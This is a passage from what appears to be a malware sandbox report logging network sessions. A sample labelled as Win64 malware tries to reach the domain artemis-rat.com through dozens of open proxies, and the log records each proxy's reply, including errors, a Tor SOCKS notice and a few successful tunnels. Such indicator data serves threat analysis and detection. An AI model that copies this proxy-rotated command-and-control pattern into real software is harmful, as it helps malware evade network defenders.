                                              Mar 11, 2024 08:37:26.069823027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.226131916 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1657192.168.2.45515166.45.246.19488887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.986382961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1658192.168.2.454362162.241.50.179537557284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.986818075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054074049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.054372072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.069561005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.069335938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1659192.168.2.455097163.172.94.175216177284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.986869097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1660192.168.2.454236128.199.196.31388327284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.987814903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054044008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1661192.168.2.455184164.92.86.113629877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.989805937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1662192.168.2.455003171.103.58.12280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.989829063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.418473959 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1663192.168.2.455087219.243.212.11884437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055381060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.383649111 CET22INHTTP/1.1 502 ERROR


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1664192.168.2.45501945.11.95.16560107284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055430889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1665192.168.2.45424790.188.250.16807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055459976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.476260900 CET340INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.2
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1666192.168.2.455120136.244.99.5188887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055819035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.360044003 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.22.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1667192.168.2.455031148.72.215.79486237284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055862904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866345882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.975090027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1668192.168.2.4551098.217.95.4488997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055864096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1669192.168.2.45510658.234.116.19781937284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055922031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1670192.168.2.45508845.11.95.16552207284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055922985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.491339922 CET39INHTTP/1.0 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1671192.168.2.4551085.252.23.22010817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055958986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1672192.168.2.45509845.11.95.16560097284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.055959940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1673192.168.2.455086116.99.226.184310707284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.056155920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1674192.168.2.45512452.67.10.18331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.056157112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.382050037 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1675192.168.2.455190104.23.128.174807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.056209087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.211591005 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1676192.168.2.45449747.184.175.16431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.056591988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.163068056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.356688023 CET1286INHTTP/1.1 503 Service Unavailable
                                              Server: squid/4.14
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:28 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3846
                                              X-Squid-Error: ERR_DNS_FAIL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1677192.168.2.45436051.158.98.197163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.056881905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.164236069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.685030937 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1678192.168.2.454539162.240.72.139374457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
